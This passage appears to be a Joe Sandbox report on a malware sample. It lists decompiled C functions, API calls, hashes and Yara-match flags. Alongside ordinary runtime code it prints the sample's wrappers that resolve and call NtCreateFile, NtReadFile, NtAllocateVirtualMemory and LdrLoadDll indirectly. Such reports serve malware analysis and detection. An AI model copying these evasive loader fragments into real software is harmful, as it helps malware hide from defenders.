                                                                    				void* _t31;
                                                                    
                                                                    				_t31 = __eflags;
                                                                    				_t26 = __edi;
                                                                    				_t25 = __edx;
                                                                    				_t20 = __ebx;
                                                                    				_push(0xc);
                                                                    				_push(0x40bff0);
                                                                    				E00403000(__ebx, __edi, __esi);
                                                                    				_t28 = E00404924(__ebx, _t31);
                                                                    				_t12 =  *0x40de6c; // 0xfffffffe
                                                                    				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                                    					L6:
                                                                    					E00405754(_t20, _t26, 0xc);
                                                                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                    					_t29 = _t28 + 0x6c;
                                                                    					 *((intOrPtr*)(_t30 - 0x1c)) = E00407EBC(_t29,  *0x40de68);
                                                                    					 *(_t30 - 4) = 0xfffffffe;
                                                                    					E00407F76();
                                                                    				} else {
                                                                    					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						_t29 =  *((intOrPtr*)(E00404924(_t20, _t33) + 0x6c));
                                                                    					}
                                                                    				}
                                                                    				_t34 = _t29;
                                                                    				if(_t29 == 0) {
                                                                    					_push(0x20);
                                                                    					E00402603(_t25, _t34);
                                                                    				}
                                                                    				return E00403045(_t29);
                                                                    			}









                                                                    0x00407f09
                                                                    0x00407f09
                                                                    0x00407f09
                                                                    0x00407f09
                                                                    0x00407f09
                                                                    0x00407f0b
                                                                    0x00407f10
                                                                    0x00407f1a
                                                                    0x00407f1c
                                                                    0x00407f24
                                                                    0x00407f48
                                                                    0x00407f4a
                                                                    0x00407f50
                                                                    0x00407f5a
                                                                    0x00407f65
                                                                    0x00407f68
                                                                    0x00407f6f
                                                                    0x00407f26
                                                                    0x00407f26
                                                                    0x00407f2a
                                                                    0x00000000
                                                                    0x00407f2c
                                                                    0x00407f31
                                                                    0x00407f31
                                                                    0x00407f2a
                                                                    0x00407f34
                                                                    0x00407f36
                                                                    0x00407f38
                                                                    0x00407f3a
                                                                    0x00407f3f
                                                                    0x00407f47

                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 00407F15
                                                                      • Part of subcall function 00404924: __getptd_noexit.LIBCMT ref: 00404927
                                                                      • Part of subcall function 00404924: __amsg_exit.LIBCMT ref: 00404934
                                                                    • __getptd.LIBCMT ref: 00407F2C
                                                                    • __amsg_exit.LIBCMT ref: 00407F3A
                                                                    • __lock.LIBCMT ref: 00407F4A
                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00407F5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                    • String ID:
                                                                    • API String ID: 938513278-0
                                                                    • Opcode ID: 86b8c03b7c509920a9c325b39e3f94a43876323c293a65739b5cdd5fa1184e19
                                                                    • Instruction ID: e6c8c54e6660f315681a90a93e5d9e9feacd7e802ff8a99e96ed5d0515e16c0a
                                                                    • Opcode Fuzzy Hash: 86b8c03b7c509920a9c325b39e3f94a43876323c293a65739b5cdd5fa1184e19
                                                                    • Instruction Fuzzy Hash: E5F06232D497019BD620BB769C0271A36905F00719F1041BFE544BB2D2CB7C6940DA9E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402336(intOrPtr _a4) {
                                                                    				struct HINSTANCE__* _t2;
                                                                    
                                                                    				_t2 = GetModuleHandleW(L"mscoree.dll");
                                                                    				if(_t2 != 0) {
                                                                    					_t2 = GetProcAddress(_t2, "CorExitProcess");
                                                                    					if(_t2 != 0) {
                                                                    						return _t2->i(_a4);
                                                                    					}
                                                                    				}
                                                                    				return _t2;
                                                                    			}




                                                                    0x00402340
                                                                    0x00402348
                                                                    0x00402350
                                                                    0x00402358
                                                                    0x00000000
                                                                    0x0040235d
                                                                    0x00402358
                                                                    0x00402360

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(mscoree.dll,?,0040236E,?,?,004081FA,000000FF,0000001E,00000001,00000000,00000000,?,00405798,?,00000001,?), ref: 00402340
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00402350
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 1646373207-1276376045
                                                                    • Opcode ID: 7504325252f0b05a44c97cba02aac48889f4e2c2d6d066100496097d34b831e7
                                                                    • Instruction ID: 3f5be2099aa8438e0d821e20e4569e4cdae1b37a527a831cddf4834487f37067
                                                                    • Opcode Fuzzy Hash: 7504325252f0b05a44c97cba02aac48889f4e2c2d6d066100496097d34b831e7
                                                                    • Instruction Fuzzy Hash: BFD0C93224030AA7DA103FB29D0DA173A5CA981B507184032BD0DF25F5DABDD821956A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00407FD8(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				char _v8;
                                                                    				signed int _v12;
                                                                    				char _v20;
                                                                    				char _t43;
                                                                    				char _t46;
                                                                    				signed int _t53;
                                                                    				signed int _t54;
                                                                    				intOrPtr _t56;
                                                                    				intOrPtr _t57;
                                                                    				int _t58;
                                                                    				char _t59;
                                                                    				short* _t60;
                                                                    				int _t65;
                                                                    				char* _t74;
                                                                    
                                                                    				_t74 = _a8;
                                                                    				if(_t74 == 0 || _a12 == 0) {
                                                                    					L5:
                                                                    					return 0;
                                                                    				} else {
                                                                    					if( *_t74 != 0) {
                                                                    						E00404CA9( &_v20, __edx, __edi, _a16);
                                                                    						_t43 = _v20;
                                                                    						__eflags =  *(_t43 + 0x14);
                                                                    						if( *(_t43 + 0x14) != 0) {
                                                                    							_t46 = E00408108( *_t74 & 0x000000ff,  &_v20);
                                                                    							__eflags = _t46;
                                                                    							if(_t46 == 0) {
                                                                    								__eflags = _a4;
                                                                    								_t40 = _v20 + 4; // 0x840ffff8
                                                                    								__eflags = MultiByteToWideChar( *_t40, 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
                                                                    								if(__eflags != 0) {
                                                                    									L10:
                                                                    									__eflags = _v8;
                                                                    									if(_v8 != 0) {
                                                                    										_t53 = _v12;
                                                                    										_t11 = _t53 + 0x70;
                                                                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                    										__eflags =  *_t11;
                                                                    									}
                                                                    									return 1;
                                                                    								}
                                                                    								L21:
                                                                    								_t54 = E00402FAC(__eflags);
                                                                    								 *_t54 = 0x2a;
                                                                    								__eflags = _v8;
                                                                    								if(_v8 != 0) {
                                                                    									_t54 = _v12;
                                                                    									_t33 = _t54 + 0x70;
                                                                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                    									__eflags =  *_t33;
                                                                    								}
                                                                    								return _t54 | 0xffffffff;
                                                                    							}
                                                                    							_t56 = _v20;
                                                                    							_t15 = _t56 + 0xac; // 0x50036ad0
                                                                    							_t65 =  *_t15;
                                                                    							__eflags = _t65 - 1;
                                                                    							if(_t65 <= 1) {
                                                                    								L17:
                                                                    								_t24 = _t56 + 0xac; // 0x50036ad0
                                                                    								__eflags = _a12 -  *_t24;
                                                                    								if(__eflags < 0) {
                                                                    									goto L21;
                                                                    								}
                                                                    								__eflags = _t74[1];
                                                                    								if(__eflags == 0) {
                                                                    									goto L21;
                                                                    								}
                                                                    								L19:
                                                                    								_t26 = _t56 + 0xac; // 0x50036ad0
                                                                    								_t57 =  *_t26;
                                                                    								__eflags = _v8;
                                                                    								if(_v8 == 0) {
                                                                    									return _t57;
                                                                    								}
                                                                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                    								return _t57;
                                                                    							}
                                                                    							__eflags = _a12 - _t65;
                                                                    							if(_a12 < _t65) {
                                                                    								goto L17;
                                                                    							}
                                                                    							__eflags = _a4;
                                                                    							_t21 = _t56 + 4; // 0x840ffff8
                                                                    							_t58 = MultiByteToWideChar( *_t21, 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                    							__eflags = _t58;
                                                                    							_t56 = _v20;
                                                                    							if(_t58 != 0) {
                                                                    								goto L19;
                                                                    							}
                                                                    							goto L17;
                                                                    						}
                                                                    						_t59 = _a4;
                                                                    						__eflags = _t59;
                                                                    						if(_t59 != 0) {
                                                                    							 *_t59 =  *_t74 & 0x000000ff;
                                                                    						}
                                                                    						goto L10;
                                                                    					} else {
                                                                    						_t60 = _a4;
                                                                    						if(_t60 != 0) {
                                                                    							 *_t60 = 0;
                                                                    						}
                                                                    						goto L5;
                                                                    					}
                                                                    				}
                                                                    			}

















                                                                    0x00407fe2
                                                                    0x00407fe9
                                                                    0x00408000
                                                                    0x00000000
                                                                    0x00407ff0
                                                                    0x00407ff2
                                                                    0x0040800c
                                                                    0x00408011
                                                                    0x00408014
                                                                    0x00408017
                                                                    0x0040803f
                                                                    0x00408046
                                                                    0x00408048
                                                                    0x004080c9
                                                                    0x004080db
                                                                    0x004080e4
                                                                    0x004080e6
                                                                    0x00408026
                                                                    0x00408026
                                                                    0x00408029
                                                                    0x0040802b
                                                                    0x0040802e
                                                                    0x0040802e
                                                                    0x0040802e
                                                                    0x0040802e
                                                                    0x00000000
                                                                    0x00408034
                                                                    0x004080a8
                                                                    0x004080a8
                                                                    0x004080ad
                                                                    0x004080b3
                                                                    0x004080b6
                                                                    0x004080b8
                                                                    0x004080bb
                                                                    0x004080bb
                                                                    0x004080bb
                                                                    0x004080bb
                                                                    0x00000000
                                                                    0x004080bf
                                                                    0x0040804a
                                                                    0x0040804d
                                                                    0x0040804d
                                                                    0x00408053
                                                                    0x00408056
                                                                    0x0040807d
                                                                    0x00408080
                                                                    0x00408080
                                                                    0x00408086
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408088
                                                                    0x0040808b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040808d
                                                                    0x0040808d
                                                                    0x0040808d
                                                                    0x00408093
                                                                    0x00408096
                                                                    0x00408005
                                                                    0x00408005
                                                                    0x0040809f
                                                                    0x00000000
                                                                    0x0040809f
                                                                    0x00408058
                                                                    0x0040805b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040805f
                                                                    0x0040806d
                                                                    0x00408070
                                                                    0x00408076
                                                                    0x00408078
                                                                    0x0040807b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040807b
                                                                    0x00408019
                                                                    0x0040801c
                                                                    0x0040801e
                                                                    0x00408023
                                                                    0x00408023
                                                                    0x00000000
                                                                    0x00407ff4
                                                                    0x00407ff4
                                                                    0x00407ff9
                                                                    0x00407ffd
                                                                    0x00407ffd
                                                                    0x00000000
                                                                    0x00407ff9
                                                                    0x00407ff2

                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040800C
                                                                    • __isleadbyte_l.LIBCMT ref: 0040803F
                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,004067D8,00000109,00BFBBEF,00000003), ref: 00408070
                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,004067D8,00000109,00BFBBEF,00000003), ref: 004080DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: d731df827b4dac3b8d5e0fe79da9bb75da47e4f98dd2d4f01c60a376491d253f
                                                                    • Instruction ID: 4aa5068cb2ed56b93f447e123f2ba93f8a66fd4e954ea3b6b2297e8dd9de02e4
                                                                    • Opcode Fuzzy Hash: d731df827b4dac3b8d5e0fe79da9bb75da47e4f98dd2d4f01c60a376491d253f
                                                                    • Instruction Fuzzy Hash: 8931F330900245EFCB10CF64CA85ABE3BA5BF01314F16857EE4A1AB2D1DB39DD44DB55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 41e7cd-41e810 call 41f243 NtAllocateVirtualMemory
                                                                    C-Code - Quality: 100%
                                                                    			E0041E7CD(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                                    				intOrPtr _v0;
                                                                    				long _t14;
                                                                    
                                                                    				_t10 = _v0;
                                                                    				E0041F243( *((intOrPtr*)(_v0 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
                                                                    				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t14;
                                                                    			}





                                                                    0x0041e7d6
                                                                    0x0041e7ea
                                                                    0x0041e80c
                                                                    0x0041e810

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID: ($
                                                                    • API String ID: 2167126740-1917586925
                                                                    • Opcode ID: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                                    • Instruction ID: 75c01ba8265e86b6e799f606f6827c4ef4659bfb27b3c208fb82fe6623ca5877
                                                                    • Opcode Fuzzy Hash: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                                    • Instruction Fuzzy Hash: 63F015B6210208BBCB14DF89DC81EEB77ADAF88754F118159BE08A7241C630FD11CBB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 176 41e5ed-41e5f1 177 41e5f3-41e644 call 41f243 NtCreateFile 176->177 178 41e5b5-41e5ec call 41f243 176->178
                                                                    C-Code - Quality: 60%
                                                                    			E0041E5ED(char __ecx, char* __edx, void* __eflags, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                    				intOrPtr* __esi;
                                                                    				void* __ebp;
                                                                    				void* _t35;
                                                                    				intOrPtr* _t36;
                                                                    
                                                                    				asm("out 0x1e, eax");
                                                                    				 *__edx = __ecx;
                                                                    				if(__eflags > 0) {
                                                                    					asm("in al, dx");
                                                                    					_t23 = _a8;
                                                                    					_t3 = _t23 + 0xa68; // 0xa90
                                                                    					_t36 = _t3;
                                                                    					E0041F243(_a8[5], _t23, _t36, _a8[5], 0, 0x27);
                                                                    					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t35);
                                                                    				} else {
                                                                    					__ebp = __esp;
                                                                    					__eax = _a4;
                                                                    					__ecx =  *((intOrPtr*)(__eax + 0x14));
                                                                    					_t11 = __eax + 0xa6c; // 0xa6c
                                                                    					__esi = _t11;
                                                                    					__eax = E0041F243( *((intOrPtr*)(__eax + 0x14)), __eax, __esi,  *((intOrPtr*)(__eax + 0x14)), 0, 0x28);
                                                                    					__edx = _a48;
                                                                    					__eax = _a44;
                                                                    					__ecx = _a40;
                                                                    					__edx = _a36;
                                                                    					__eax = _a32;
                                                                    					__ecx = _a28;
                                                                    					__edx = _a24;
                                                                    					__eax = _a20;
                                                                    					__ecx = _a16;
                                                                    					__edx = _a12;
                                                                    					__eax = _a8;
                                                                    					__ecx =  *__esi;
                                                                    					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                    					__esi = __esi;
                                                                    					__ebp = __ebp;
                                                                    					return __eax;
                                                                    				}
                                                                    			}







                                                                    0x0041e5ed
                                                                    0x0041e5ef
                                                                    0x0041e5f1
                                                                    0x0041e5b5
                                                                    0x0041e5b6
                                                                    0x0041e5c2
                                                                    0x0041e5c2
                                                                    0x0041e5ca
                                                                    0x0041e5ec
                                                                    0x0041e5f3
                                                                    0x0041e5f4
                                                                    0x0041e5f6
                                                                    0x0041e5f9
                                                                    0x0041e602
                                                                    0x0041e602
                                                                    0x0041e60a
                                                                    0x0041e60f
                                                                    0x0041e612
                                                                    0x0041e615
                                                                    0x0041e61c
                                                                    0x0041e620
                                                                    0x0041e624
                                                                    0x0041e628
                                                                    0x0041e62c
                                                                    0x0041e630
                                                                    0x0041e634
                                                                    0x0041e638
                                                                    0x0041e63c
                                                                    0x0041e640
                                                                    0x0041e642
                                                                    0x0041e643
                                                                    0x0041e644
                                                                    0x0041e644

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                                    • Instruction ID: bf58b033f4df4117e7473d6230dd595e805d3fddb0b0a0f6bc399e62227eb295
                                                                    • Opcode Fuzzy Hash: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                                    • Instruction Fuzzy Hash: C71112B2604208BFCB08DF98DC85EEB37ADEF8C754F048258BA0C97241D631E951CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 200 40cf23-40cf3f 201 40cf47-40cf4c 200->201 202 40cf42 call 420f13 200->202 203 40cf52-40cf60 call 421433 201->203 204 40cf4e-40cf51 201->204 202->201 207 40cf70-40cf81 call 41f7b3 203->207 208 40cf62-40cf6d call 4216b3 203->208 213 40cf83-40cf97 LdrLoadDll 207->213 214 40cf9a-40cf9d 207->214 208->207 213->214
                                                                    C-Code - Quality: 100%
                                                                    			E0040CF23(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                    				char* _v8;
                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                    				char _v536;
                                                                    				void* _t15;
                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                    				void* _t30;
                                                                    				void* _t31;
                                                                    				void* _t32;
                                                                    
                                                                    				_t24 = _a8;
                                                                    				_v8 =  &_v536;
                                                                    				_t15 = E00420F13( &_v12, 0x104, _a8);
                                                                    				_t31 = _t30 + 0xc;
                                                                    				if(_t15 != 0) {
                                                                    					_t17 = E00421433(_v8, _t24, __eflags, _v8);
                                                                    					_t32 = _t31 + 4;
                                                                    					__eflags = _t17;
                                                                    					if(_t17 != 0) {
                                                                    						E004216B3( &_v12, 0);
                                                                    						_t32 = _t32 + 8;
                                                                    					}
                                                                    					_t18 = E0041F7B3(_v8);
                                                                    					_v16 = _t18;
                                                                    					__eflags = _t18;
                                                                    					if(_t18 == 0) {
                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                    						return _v16;
                                                                    					}
                                                                    					return _t18;
                                                                    				} else {
                                                                    					return _t15;
                                                                    				}
                                                                    			}













                                                                    0x0040cf2c
                                                                    0x0040cf3f
                                                                    0x0040cf42
                                                                    0x0040cf47
                                                                    0x0040cf4c
                                                                    0x0040cf56
                                                                    0x0040cf5b
                                                                    0x0040cf5e
                                                                    0x0040cf60
                                                                    0x0040cf68
                                                                    0x0040cf6d
                                                                    0x0040cf6d
                                                                    0x0040cf74
                                                                    0x0040cf7c
                                                                    0x0040cf7f
                                                                    0x0040cf81
                                                                    0x0040cf95
                                                                    0x00000000
                                                                    0x0040cf97
                                                                    0x0040cf9d
                                                                    0x0040cf51
                                                                    0x0040cf51
                                                                    0x0040cf51

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF95
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                                    • Instruction ID: 5e04f6221a37e6357fdc510ce1da2c9258563d4a4a23712c115eaecd70357e5d
                                                                    • Opcode Fuzzy Hash: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                                    • Instruction Fuzzy Hash: D30152B1E4010EABDF10DBA1DD82F9EB3789B54308F0042A6E908A7280F634EB448B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 215 41e69d-41e6a1 216 41e6a3-41e6ec call 41f243 NtReadFile 215->216 217 41e6ed-41e6ef 215->217
                                                                    APIs
                                                                    • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                                    • Instruction ID: afefd89c63c408e271d207366b207e4e6e1d150e5249734bbce09756756f7a8e
                                                                    • Opcode Fuzzy Hash: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                                    • Instruction Fuzzy Hash: 2FF014B6200208AFCB04DF9ACC84EEB77A9EF8C754F118258BE0D97240D630E941CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 220 41e5f3-41e644 call 41f243 NtCreateFile
                                                                    C-Code - Quality: 100%
                                                                    			E0041E5F3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                    				long _t21;
                                                                    
                                                                    				_t3 = _a4 + 0xa6c; // 0xa6c
                                                                    				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                    				return _t21;
                                                                    			}




                                                                    0x0041e602
                                                                    0x0041e60a
                                                                    0x0041e640
                                                                    0x0041e644

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                                    • Instruction ID: 896d7442baf9be4756d905739e1f90aa296932759f722aab2a73c44ca3a6dc04
                                                                    • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                                    • Instruction Fuzzy Hash: D3F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 223 41e6a3-41e6ec call 41f243 NtReadFile
                                                                    C-Code - Quality: 37%
                                                                    			E0041E6A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                    				void* _t18;
                                                                    				intOrPtr* _t27;
                                                                    
                                                                    				_t3 = _a4 + 0xa74; // 0xa76
                                                                    				_t27 = _t3;
                                                                    				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                                    				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                    				return _t18;
                                                                    			}





                                                                    0x0041e6b2
                                                                    0x0041e6b2
                                                                    0x0041e6ba
                                                                    0x0041e6e8
                                                                    0x0041e6ec

                                                                    APIs
                                                                    • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                                    • Instruction ID: a52c969a109bbc10a8a1a781a5aa37a0394cb6bb67041f9c77339075023d92d4
                                                                    • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                                    • Instruction Fuzzy Hash: 4EF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 226 41e7d3-41e7e9 227 41e7ef-41e810 NtAllocateVirtualMemory 226->227 228 41e7ea call 41f243 226->228 228->227
                                                                    C-Code - Quality: 100%
                                                                    			E0041E7D3(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                    				long _t14;
                                                                    
